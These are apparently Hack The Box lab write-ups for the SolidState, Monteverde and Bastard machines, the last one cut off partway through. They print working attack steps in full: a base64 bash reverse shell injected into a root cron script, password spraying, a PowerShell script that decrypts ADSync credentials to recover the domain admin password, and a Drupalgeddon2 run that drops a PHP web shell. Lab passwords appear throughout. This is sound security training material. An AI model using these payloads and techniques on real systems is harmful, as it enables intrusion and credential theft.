syn-ack ttl 63 JAMES pop3d 2.3.2 119/tcp open nntp syn-ack ttl 63 JAMES nntpd (posting ok) 4555/tcp open rsip? 
syn-ack ttl 63\n| fingerprint-strings:\n| GenericLines:\n| JAMES Remote Administration Tool 2.3.2\n| Please enter your login and password\n| Login id:\n| Password:\n| Login failed for\n|_ Login id:\nFoothold\nJAMES Remote Administration Tool 2.3.2 (port 5557)\nWe observe a service running on port 5557 that asks for a username and password. Searching online, we find default credentials for this tool: root / root\nWe can then list the users and change their passwords, which gives access to their mailboxes. Here, we change the password of the user mindy to: mindy.\ntelnet 10.10.10.51 4555\nTrying 10.10.10.51...\nConnected to 10.10.10.51.\nEscape character is '^]'.\nJAMES Remote Administration Tool 2.3.2\nPlease enter your login and password\nLogin id: root\nPassword: root\nWelcome root. HELP for a list of commands\nHELP\nCurrently implemented commands:\nhelp display this help\nlistusers display existing accounts\ncountusers display the number of existing accounts\nadduser [username] [password] add a new user\nverify [username] verify if specified user exist\ndeluser [username] delete existing user\nsetpassword [username] [password] sets a user's password\nsetalias [user] [alias] locally forwards all email for 'user' to 'alias'\nshowalias [username] shows a user's current email alias\nunsetalias [user] unsets an alias for 'user'\nsetforwarding [username] [emailaddress] forwards a user's email to another email address\nshowforwarding [username] shows a user's current email forwarding\nunsetforwarding [username] removes a forward\nuser [repositoryname] change to another user repository\nshutdown kills the current JVM (convenient when James is run as a daemon)\nquit close connection\nlistusers\nExisting accounts 6\nuser: james\nuser: ../../../../../../../../etc/bash_completion.d\nuser: thomas\nuser: john\nuser: mindy\nuser: mailadmin\nsetpassword mindy mindy\nPassword for mindy reset\nquit\nBye\nConnection closed by foreign host.\nPOP3 : mindy mails\nUsing Thunderbird, we try to access her mails. A real pain... (did not succeed).\nWith telnet, we connect to port 110 (POP3) as the user mindy. We find 2 emails, which we retrieve:\ntelnet 10.10.10.51 110\nTrying 10.10.10.51...\nConnected to 10.10.10.51.\nEscape character is '^]'.\nUSER mindy\nPASS mindy\nLIST\n+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready\n+OK\n+OK Welcome mindy\n+OK 2 1945\n1 1109\n2 836\n.\nRETR 1\n+OK Message follows\nReturn-Path: <mailadmin@localhost>\nMessage-ID: <5420213.0.1503422039826.JavaMail.root@solidstate>\nMIME-Version: 1.0\nContent-Type: text/plain; charset=us-ascii\nContent-Transfer-Encoding: 7bit\nDelivered-To: mindy@localhost\nReceived: from 192.168.11.142 ([192.168.11.142]) by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 798 for <mindy@localhost>; Tue, 22 Aug 2017 13:13:42 -0400 (EDT)\nDate: Tue, 22 Aug 2017 13:13:42 -0400 (EDT)\nFrom: mailadmin@localhost\nSubject: Welcome\n\nDear Mindy,\nWelcome to Solid State Security Cyber team! We are delighted you are joining us as a junior defense analyst. Your role is critical in fulfilling the mission of our orginzation. The enclosed information is designed to serve as an introduction to Cyber Security and provide resources that will help you make a smooth transition into your new role.\nThe Cyber team is here to support your transition so, please know that you can call on any of us to assist you.\nWe are looking forward to you joining our team and your success at Solid State Security.\nRespectfully,\nJames\n.\nRETR 2\n+OK Message follows\nReturn-Path: <mailadmin@localhost>\nMessage-ID: <16744123.2.1503422270399.JavaMail.root@solidstate>\nMIME-Version: 1.0\nContent-Type: text/plain; charset=us-ascii\nContent-Transfer-Encoding: 7bit\nDelivered-To: mindy@localhost\nReceived: from 192.168.11.142 ([192.168.11.142]) by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581 for <mindy@localhost>; Tue, 22 Aug 2017 13:17:28 -0400 (EDT)\nDate: Tue, 22 Aug 2017 13:17:28 -0400 (EDT)\nFrom: mailadmin@localhost\nSubject: Your Access\n\nDear Mindy,\nHere are your ssh credentials to access the system. Remember to reset your password after your first login.\nYour access is restricted at the moment, feel free to ask your supervisor to add any commands you need to your path.\nusername: mindy\npass: P@55W0rd1!2@\nRespectfully,\nJames\n.\nEXIT\n-ERR\nQUIT\n+OK Apache James POP3 Server signing off.\nConnection closed by foreign host.\nIn the second email, we find cleartext credentials: mindy : P@55W0rd1!2@\nSSH Connection to mindy account : user flag\nWe connect to mindy over ssh and grab the user flag user.txt.\n$ ssh mindy@10.10.10.51\nmindy@10.10.10.51's password:\nLinux solidstate 4.9.0-3-686-pae #1 SMP Debian 4.9.30-2+deb9u3 (2017-08-06) i686\n\nThe programs included with the Debian GNU/Linux system are free software;\nthe exact distribution terms for each program are described in the\nindividual files in /usr/share/doc/*/copyright.\n\nDebian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent\npermitted by applicable law.\nLast login: Tue Aug 22 14:00:02 2017 from 192.168.11.142\nmindy@solidstate:~$ cat user.txt\nc00a.....c6b2\nPrivilege Escalation\nmindy : restricted bash\nBy default, we land in a restricted shell. Almost no action is allowed...\nmindy@solidstate:~$ ls\nbin user.txt\nmindy@solidstate:~$ cd ..\n-rbash: cd: restricted\nmindy@solidstate:~$ /bin/ls\n-rbash: /bin/ls: restricted: cannot specify `/' in command names\nBut thanks to ssh, we can specify a command to execute at login. For example, ask it to launch bash, which bypasses the launch of the restricted bash!\n$ ssh mindy@10.10.10.51 bash\nmindy@10.10.10.51's password:\nls\nbin\nuser.txt\ncd ..\nls\njames\nmindy\n----------------------\n$ ssh mindy@10.10.10.51 -t \"bash --noprofile\"\nmindy@10.10.10.51's password:\n${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ ls\nbin user.txt\n${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ cd ..\n${debian_chroot:+($debian_chroot)}mindy@solidstate:/home$ ls\njames mindy\n${debian_chroot:+($debian_chroot)}mindy@solidstate:/home$ exit\nConnection to 10.10.10.51 closed.\nroot file : /opt/tmp.py\nUsing linpeas and/or linenum, we discover a file /opt/tmp.py that appears to empty the /tmp directory using os.system(). The file permissions are 777 (rwxrwxrwx). The file is owned by root but writable by anyone, including mindy. So I tried inserting a command to get a reverse shell.\nGiven what this script does, we can deduce that it must be run from a cron job, probably as root.\nAfter a few minutes, I indeed receive a shell as root on the machine, which confirms our theory:\n${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ cat tmp.py\n#!/usr/bin/env python\nimport os\nimport sys\n# Reverse shell\nos.system('echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi44LzkwMDEgMD4mMQ== | base64 -d | bash')\n# Original script code\ntry:\n    os.system('rm -r /tmp/* ')\nexcept:\n    sys.exit()\n--------------------------------------------\n$ nc -lnvp 9001\nNcat: Version 7.93 ( https://nmap.org/ncat )\nNcat: Listening on :::9001\nNcat: Listening on 0.0.0.0:9001\nNcat: Connection from 10.10.10.51.\nNcat: Connection from 10.10.10.51:58410.\nbash: cannot set terminal process group (31712): Inappropriate ioctl for device\nbash: no job control in this shell\nroot@solidstate:~# whoami\nwhoami\nroot\nroot@solidstate:~# cat /root/root.txt\ncat /root/root.txt\n0574.....d2b9\nTips\nALWAYS look carefully and in detail at the output of linpeas or linenum. Sometimes we can miss files/binaries that are out of the ordinary. For example, here we had /opt/tmp.py, which should have jumped out at me. These files are not necessarily highlighted in red... ","date":"2025-07-22T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/solidstate-htb/","title":"HTB | SolidState"},{"content":" Machine name | OS | IP | Difficulty\nMonteverde | Windows | 10.10.10.172 | Medium\nUsers\nSABatchJobs:SABatchJobs\nmhope:4n0therD4y@n0th3r$\nadministrator:d0m@in4dminyeah!\nEnumeration\nnmap\n$ nmap -sC -sV -An -T4 -vvv -p- 10.10.10.172\nStarting Nmap 7.93 ( https://nmap.org ) at 2025-07-17 23:38 CEST\n... 
PORT STATE SERVICE REASON VERSION\n53/tcp open domain syn-ack ttl 127 Simple DNS Plus\n88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-07-17 21:39:43Z)\n135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC\n139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn\n389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)\n445/tcp open microsoft-ds? syn-ack ttl 127\n464/tcp open kpasswd5? syn-ack ttl 127\n593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0\n636/tcp open tcpwrapped syn-ack ttl 127\n3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)\n3269/tcp open tcpwrapped syn-ack ttl 127\n5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)\n|_http-title: Not Found\n|_http-server-header: Microsoft-HTTPAPI/2.0\n9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing\n49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC\n49673/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0\n49674/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC\n49676/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC\n49696/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC\n49750/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC\nWarning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port\nOS fingerprint not ideal because: Missing a closed TCP port so results incomplete\nNo OS matches for host\nFoothold\nGetting users using nxc\nWith nxc smb and the anonymous user, we retrieve a list of users.\n$ nxc smb 10.10.10.172 -u '' -p '' --users | tr -s ' ' | cut -d ' ' -f 5 | head -n13 | tail -n 10 | tee users.txt\nGuest\nAAD_987d7f2f57d2\nmhope\nSABatchJobs\nsvc-ata\nsvc-bexec\nsvc-netapp\ndgalanos\nroleary\nsmorgan\nPassword Spray\nWe attempt a password spray with \"user == password\" and discover the following credentials:\nSABatchJobs:SABatchJobs\n$ nxc smb 10.10.10.172 -u users.txt -p users.txt --continue-on-success --no-bruteforce\nSMB 10.10.10.172 445 MONTEVERDE [*] Windows 10 / Server 2019 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)\nSMB 10.10.10.172 445 MONTEVERDE [-] MEGABANK.LOCAL\\Guest:Guest STATUS_LOGON_FAILURE\nSMB 10.10.10.172 445 MONTEVERDE [-] MEGABANK.LOCAL\\AAD_987d7f2f57d2:AAD_987d7f2f57d2 STATUS_LOGON_FAILURE\nSMB 10.10.10.172 445 MONTEVERDE [-] MEGABANK.LOCAL\\mhope:mhope STATUS_LOGON_FAILURE\nSMB 10.10.10.172 445 MONTEVERDE [+] MEGABANK.LOCAL\\SABatchJobs:SABatchJobs\nSMB 10.10.10.172 445 MONTEVERDE [-] MEGABANK.LOCAL\\svc-ata:svc-ata STATUS_LOGON_FAILURE\nSMB 10.10.10.172 445 MONTEVERDE [-] MEGABANK.LOCAL\\svc-bexec:svc-bexec STATUS_LOGON_FAILURE\nSMB 10.10.10.172 445 MONTEVERDE [-] MEGABANK.LOCAL\\svc-netapp:svc-netapp STATUS_LOGON_FAILURE\nSMB 10.10.10.172 445 MONTEVERDE [-] MEGABANK.LOCAL\\dgalanos:dgalanos STATUS_LOGON_FAILURE\nSMB 10.10.10.172 445 MONTEVERDE [-] MEGABANK.LOCAL\\roleary:roleary STATUS_LOGON_FAILURE\nSMB 10.10.10.172 445 MONTEVERDE [-] MEGABANK.LOCAL\\smorgan:smorgan STATUS_LOGON_FAILURE\n'users$' and 'azure_uploads' smb shares : READ ACCESS\nWith smbmap we find that the shares 'users$' and 'azure_uploads' are readable:\nsmbmap -H \"10.10.10.172\" -u SABatchJobs -p SABatchJobs\n-----------------------------------------------------------------------------\nSMBMap - Samba Share Enumerator v1.10.7 | Shawn Evans - ShawnDEvans@gmail.com\nhttps://github.com/ShawnDEvans/smbmap\n[*] Detected 1 hosts serving SMB\n[*] Established 1 SMB connections(s) and 1 authenticated session(s)\n[+] IP: 10.10.10.172:445\tName: MEGABANK.LOCAL Status: Authenticated\nDisk Permissions\tComment\n---- -----------\t-------\nADMIN$ NO ACCESS\tRemote Admin\nazure_uploads READ ONLY\t\nC$ NO ACCESS\tDefault share\nE$ NO ACCESS\tDefault share\nIPC$ READ ONLY\tRemote IPC\nNETLOGON READ ONLY\tLogon server share\nSYSVOL READ ONLY\tLogon server share\nusers$ READ ONLY\nWe notice that azure_uploads is empty.\nIn users$ we find the folder of another user, \"mhope\", containing an azure.xml file:\n$ smbclient //10.10.10.172/users$ -U MEGABANK.LOCAL/SABatchJobs\nPassword for [MEGABANK.LOCAL\\SABatchJobs]:\nTry \"help\" to get a list of possible commands.\nsmb: \\> ls\n. D 0 Fri Jan 3 14:12:48 2020\n.. D 0 Fri Jan 3 14:12:48 2020\ndgalanos D 0 Fri Jan 3 14:12:30 2020\nmhope D 0 Fri Jan 3 14:41:18 2020\nroleary D 0 Fri Jan 3 14:10:30 2020\nsmorgan D 0 Fri Jan 3 14:10:24 2020\n31999 blocks of size 4096. 28979 blocks available\nsmb: \\> cd mhope\nsmb: \\mhope\\> ls\n. D 0 Fri Jan 3 14:41:18 2020\n.. D 0 Fri Jan 3 14:41:18 2020\nazure.xml AR 1212 Fri Jan 3 14:40:23 2020\n31999 blocks of size 4096. 28979 blocks available\nsmb: \\mhope\\> get azure.xml\ngetting file \\mhope\\azure.xml of size 1212 as azure.xml (15.0 KiloBytes/sec) (average 15.0 KiloBytes/sec)\nThis file contains a password, 4n0therD4y@n0th3r$:\ncat azure.xml\n<Objs Version=\"1.1.0.1\" xmlns=\"http://schemas.microsoft.com/powershell/2004/04\">\n  <Obj RefId=\"0\">\n    <TN RefId=\"0\">\n      <T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T>\n      <T>System.Object</T>\n    </TN>\n    <ToString>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</ToString>\n    <Props>\n      <DT N=\"StartDate\">2020-01-03T05:35:00.7562298-08:00</DT>\n      <DT N=\"EndDate\">2054-01-03T05:35:00.7562298-08:00</DT>\n      <G N=\"KeyId\">00000000-0000-0000-0000-000000000000</G>\n      <S N=\"Password\">4n0therD4y@n0th3r$</S>\n    </Props>\n  </Obj>\n</Objs>\nEvil-winrm : mhope -> user flag\nWe get access via evil-winrm as mhope with the password found earlier, 4n0therD4y@n0th3r$:\nevil-winrm -u mhope -p '4n0therD4y@n0th3r$' -i \"10.10.10.172\"\nEvil-WinRM shell v3.7\nInfo: Establishing connection to remote endpoint\n*Evil-WinRM* PS C:\\Users\\mhope\\Documents> cd ../Desktop\n*Evil-WinRM* PS C:\\Users\\mhope\\Desktop> cat \"C:/Users/mhope/Desktop/user.txt\"\n4437.....5f01\nPrivilege Escalation\nmhope Group : Azure Admins\nWe observe that mhope is a member of the Azure Admins group.\n*Evil-WinRM* PS C:\\Users\\mhope\\Documents> whoami /groups\nGROUP INFORMATION\n-----------------\nGroup Name Type SID Attributes\n=======================================\n...\nMEGABANK\\Azure Admins Group S-1-5-21-391775091-850290835-3566037492-2601 Mandatory group, Enabled by default, Enabled group\n...\nSQL Server: ADSync database\nWe observe a \"sqlservr\" process.\n*Evil-WinRM* PS C:\\Users\\mhope\\Documents> Get-Process sqlservr\nHandles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName\n------- ------ ----- ----- ------ -- -- -----------\n832 114 406004 275560 3436 0 sqlservr\nWe notice that sqlcmd is installed and we see an \"ADSync\" database. We can indeed query the database without supplying a user/password:\n*Evil-WinRM* PS C:\\Users\\mhope\\Documents> sqlcmd -Q 'SELECT name FROM sys.databases'\nname\n--------------------------------------------------------------------------------------------------------------------------------\nmaster\ntempdb\nmodel\nmsdb\nADSync\n(5 rows affected)\nScript\nWe find a script by xpn on GitHub. This script connects to the ADSync database, extracts the (encrypted) configuration, then decrypts it. We thereby obtain the administrator's password. The script relies on information from the database together with the binary 'C:\\Program Files\\Microsoft Azure AD Sync\\Bin\\mcrypt.dll' to recover the configuration containing the administrator credentials:\nhttps://gist.github.com/xpn/0dc393e944d8733e3c63023968583545\nWhen using the script, we notice that it does not work. The lines of code that connect to the database seem incorrect:\n*Evil-WinRM* PS C:\\Users\\mhope\\Documents> $client = new-object System.Data.SqlClient.SqlConnection -ArgumentList \"Data Source=(localdb)\\.\\ADSync;Initial Catalog=ADSync\"\n$client.Open()\nSearching online, I was able to fix the line of code that connects to the database. I also noticed some errors with quotation marks in a suspicious format. I replaced those quotation marks with \"'\" or '\"'.\nWrite-Host \"AD Connect Sync Credential Extract POC\"\n$SQLServer = \"127.0.0.1\"\n$SQLDBName = \"ADSync\"\n$client = New-Object System.Data.SqlClient.SqlConnection\n$client.ConnectionString = \"Server = $SQLServer; Database = $SQLDBName; Integrated Security = True\"\n$client.Open()\n$cmd = $client.CreateCommand()\n$cmd.CommandText = \"SELECT keyset_id, instance_id, entropy FROM mms_server_configuration\"\n$reader = $cmd.ExecuteReader()\n$reader.Read() | Out-Null\n$key_id = $reader.GetInt32(0)\n$instance_id = $reader.GetGuid(1)\n$entropy = $reader.GetGuid(2)\n$reader.Close()\n$cmd = $client.CreateCommand()\n$cmd.CommandText = \"SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent WHERE ma_type = 'AD'\"\n$reader = $cmd.ExecuteReader()\n$reader.Read() | Out-Null\n$config = $reader.GetString(0)\n$crypted = $reader.GetString(1)\n$reader.Close()\nadd-type -path 'C:\\Program Files\\Microsoft Azure AD Sync\\Bin\\mcrypt.dll'\n$km = New-Object -TypeName Microsoft.DirectoryServices.MetadirectoryServices.Cryptography.KeyManager\n$km.LoadKeySet($entropy, $instance_id, $key_id)\n$key = $null\n$km.GetActiveCredentialKey([ref]$key)\n$key2 = $null\n$km.GetKey(1, [ref]$key2)\n$decrypted = $null\n$key2.DecryptBase64ToString($crypted, [ref]$decrypted)\nWrite-Host $decrypted\n$domain = select-xml -Content $config -XPath \"//parameter[@name='forest-login-domain']\" | select @{Name = 'Domain'; Expression = {$_.node.InnerXML}}\n$username = select-xml -Content $config -XPath \"//parameter[@name='forest-login-user']\" | select @{Name = 'Username'; Expression = {$_.node.InnerXML}}\n$password = select-xml -Content $decrypted -XPath \"//attribute\" | select @{Name = 'Password'; Expression = {$_.node.InnerXML}}\nWrite-Host (\"Domain: \" + $domain.Domain)\nWrite-Host (\"Username: \" + $username.Username)\nWrite-Host (\"Password: \" + $password.Password)\nOutput\nAfter fixing the quotation marks, we run the .ps1 and obtain the admin creds:\n*Evil-WinRM* PS C:\\Users\\mhope\\Documents> .\\decrypt.ps1\nAD Connect Sync Credential Extract POC\n<encrypted-attributes>\n  <attribute name=\"password\">d0m@in4dminyeah!</attribute>\n</encrypted-attributes>\nDomain: MEGABANK.LOCAL\nUsername: administrator\nPassword: d0m@in4dminyeah!\nAdministrator pwned\n[Jul 20, 2025 - 14:56:12 (CEST)] exegol-pentest Monteverde # evil-winrm -u \"administrator\" -p 'd0m@in4dminyeah!' -i 10.10.10.172\nEvil-WinRM shell v3.7\nInfo: Establishing connection to remote endpoint\n*Evil-WinRM* PS C:\\Users\\Administrator\\Documents> cd ../Desktop\n*Evil-WinRM* PS C:\\Users\\Administrator\\Desktop> cat root.txt\n9f15.....9bf4\nTips\nAlways check the scripts you find. Debug, then find the error. Beware of suspicious quotation marks; always replace them with '\"' or '\"'. ","date":"2025-07-20T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/monteverde-htb/","title":"HTB | Monteverde"},{"content":" Machine name | OS | IP | Difficulty\nPlanning | Linux | 10.10.11.68 | Easy\nSoon :)\n","date":"2025-07-12T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/planning-htb/","title":"HTB | Planning"},{"content":" Machine name | OS | IP | Difficulty\nBastard | Windows | 10.10.10.9 | Medium\nEnumeration\nnmap\n$ nmap -sC -sV -p- -An -vvv 10.10.10.9\nStarting Nmap 7.93 ( https://nmap.org ) at 2025-07-11 15:53 CEST\nPORT STATE SERVICE REASON VERSION\n80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 7.5\n|_http-favicon: Unknown favicon MD5: CF2445DCB53A031C02F9B57E2199BC03\n| http-methods:\n| Supported Methods: OPTIONS TRACE GET HEAD POST\n|_ Potentially risky methods: TRACE\n| http-robots.txt: 36 disallowed entries\n| /includes/ /misc/ /modules/ /profiles/ /scripts/\n| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt\n| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt\n| /LICENSE.txt /MAINTAINERS.txt /update.php /UPGRADE.txt /xmlrpc.php\n| /admin/ /comment/reply/ /filter/tips/ /node/add/ /search/\n| /user/register/ /user/password/ /user/login/ /user/logout/ /?q=admin/\n| /?q=comment/reply/ /?q=filter/tips/ /?q=node/add/ /?q=search/\n|_/?q=user/password/ /?q=user/register/ /?q=user/login/ /?q=user/logout/\n|_http-server-header: Microsoft-IIS/7.5\n|_http-generator: Drupal 7 (http://drupal.org)\n|_http-title: Welcome to Bastard | Bastard\n135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC\n49154/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC\nWarning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port\nDevice type: general purpose|phone|specialized\nRunning (JUST GUESSING): Microsoft 
Windows 8|Phone|2008|7|8.1|Vista|2012 (92%) OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2012:r2 OS fingerprint not ideal because: Missing a closed TCP port so results incomplete Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows 7 or Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 or Windows 8.1 (91%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (91%), Microsoft Windows 7 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (91%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (91%) No exact OS matches for host (test conditions non-ideal). Foothold Drupal 7.54 On découvre sur le port 80 une page de login. Il est mentionné qu\u0026rsquo;il s\u0026rsquo;agit d\u0026rsquo;un site web Drupal. On trouve la version de Drupal dans un fichier changelog.txt :\nhttp://10.10.10.9/changelog.txt Drupal 7.54, 2017-02-01\nCVE-2018-7600 | drupalgeddon2 En utilisant searchsploit, on trouve une RCE qui ne necessite pas d\u0026rsquo;authentification et qui fonctionne pour les versions avant 7.58 (donc OK pour 7.54).\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 $ searchsploit drupal 7.54 ----------------------------------------------------------------------------------- Exploit Title | Path ----------------------------------------------------------------------------------- Drupal \u0026lt; 7.58 / \u0026lt; 8.3.9 / \u0026lt; 8.4.6 / \u0026lt; 8.5.1 - \u0026#39;Drupalgeddon2\u0026#39; Remote Code Execution | php/webapps/44449.rb ... 
$ searchsploit -m php/webapps/44449.rb Exploit: Drupal \u0026lt; 7.58 / \u0026lt; 8.3.9 / \u0026lt; 8.4.6 / \u0026lt; 8.5.1 - \u0026#39;Drupalgeddon2\u0026#39; Remote Code Execution URL: https://www.exploit-db.com/exploits/44449 Path: /opt/tools/exploitdb/exploits/php/webapps/44449.rb Codes: CVE-2018-7600 Verified: True File Type: Ruby script, ASCII text Copied to: /workspace/drupwn/44449.rb On lance l\u0026rsquo;exploitation, et on obtient directement un shell non-interactif sur lequel on peut executer des commandes.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 $ ruby 44449.rb http://10.10.10.9 [*] --==[::#Drupalggedon2::]==-- -------------------------------------------------------------------------------- [i] Target : http://10.10.10.9/ -------------------------------------------------------------------------------- [+] Found : http://10.10.10.9/CHANGELOG.txt (HTTP Response: 200) [+] Drupal!: v7.54 -------------------------------------------------------------------------------- [*] Testing: Form (user/password) [+] Result : Form valid - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - [*] Testing: Clean URLs [+] Result : Clean URLs enabled -------------------------------------------------------------------------------- [*] Testing: Code Execution (Method: name) [i] Payload: echo CGATSMRW [+] Result : CGATSMRW [+] Good News Everyone! Target seems to be exploitable (Code execution)! w00hooOO! 
-------------------------------------------------------------------------------- [*] Testing: Existing file (http://10.10.10.9/shell.php) [i] Response: HTTP 404 // Size: 12 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - [*] Testing: Writing To Web Root (./) [i] Payload: echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee shell.php [!] Target is NOT exploitable [2-4] (HTTP Response: 404)... Might not have write access? - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - [*] Testing: Existing file (http://10.10.10.9/sites/default/shell.php) [i] Response: HTTP 404 // Size: 12 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - [*] Testing: Writing To Web Root (sites/default/) [i] Payload: echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee sites/default/shell.php [!] Target is NOT exploitable [2-4] (HTTP Response: 404)... Might not have write access? - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - [*] Testing: Existing file (http://10.10.10.9/sites/default/files/shell.php) [i] Response: HTTP 404 // Size: 12 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - [*] Testing: Writing To Web Root (sites/default/files/) [*] Moving : ./sites/default/files/.htaccess [i] Payload: mv -f sites/default/files/.htaccess sites/default/files/.htaccess-bak; echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee sites/default/files/shell.php [!] Target is NOT exploitable [2-4] (HTTP Response: 404)... Might not have write access? [!] 
FAILED : Couldn\u0026#39;t find a writeable web path -------------------------------------------------------------------------------- [*] Dropping back to direct OS commands drupalgeddon2\u0026gt;\u0026gt; ls drupalgeddon2\u0026gt;\u0026gt; whoami nt authority\\iusr drupalgeddon2\u0026gt;\u0026gt; dir Volume in drive C has no label. Volume Serial Number is C4CD-C60B Directory of C:\\inetpub\\drupal-7.54 19/03/2017 09:04 �� \u0026lt;DIR\u0026gt; . 19/03/2017 09:04 �� \u0026lt;DIR\u0026gt; .. 19/03/2017 01:42 �� 317 .editorconfig 19/03/2017 01:42 �� 174 .gitignore 19/03/2017 01:42 �� 5.969 .htaccess 19/03/2017 01:42 �� 6.604 authorize.php 19/03/2017 01:42 �� 110.781 CHANGELOG.txt 19/03/2017 01:42 �� 1.481 COPYRIGHT.txt 19/03/2017 01:42 �� 720 cron.php 19/03/2017 01:43 �� \u0026lt;DIR\u0026gt; includes 19/03/2017 01:42 �� 529 index.php 19/03/2017 01:42 �� 1.717 INSTALL.mysql.txt 19/03/2017 01:42 �� 1.874 INSTALL.pgsql.txt 19/03/2017 01:42 �� 703 install.php 19/03/2017 01:42 �� 1.298 INSTALL.sqlite.txt 19/03/2017 01:42 ��17.995 INSTALL.txt 19/03/2017 01:42 ��18.092 LICENSE.txt 19/03/2017 01:42 �� 8.710 MAINTAINERS.txt 19/03/2017 01:43 �� \u0026lt;DIR\u0026gt; misc 19/03/2017 01:43 �� \u0026lt;DIR\u0026gt; modules 19/03/2017 01:43 �� \u0026lt;DIR\u0026gt; profiles 19/03/2017 01:42 �� 5.382 README.txt 19/03/2017 01:42 �� 2.189 robots.txt 19/03/2017 01:43 �� \u0026lt;DIR\u0026gt; scripts 19/03/2017 01:43 �� \u0026lt;DIR\u0026gt; sites 19/03/2017 01:43 �� \u0026lt;DIR\u0026gt; themes 19/03/2017 01:42 ��19.986 update.php 19/03/2017 01:42 ��10.123 UPGRADE.txt 19/03/2017 01:42 �� 2.200 web.config 19/03/2017 01:42 �� 417 xmlrpc.php 21 File(s) 217.261 bytes 9 Dir(s) 4.135.231.488 bytes free drupalgeddon2\u0026gt;\u0026gt; dir C:\\Users Volume in drive C has no label. Volume Serial Number is C4CD-C60B Directory of C:\\Users 19/03/2017 08:35 �� \u0026lt;DIR\u0026gt; . 19/03/2017 08:35 �� \u0026lt;DIR\u0026gt; .. 
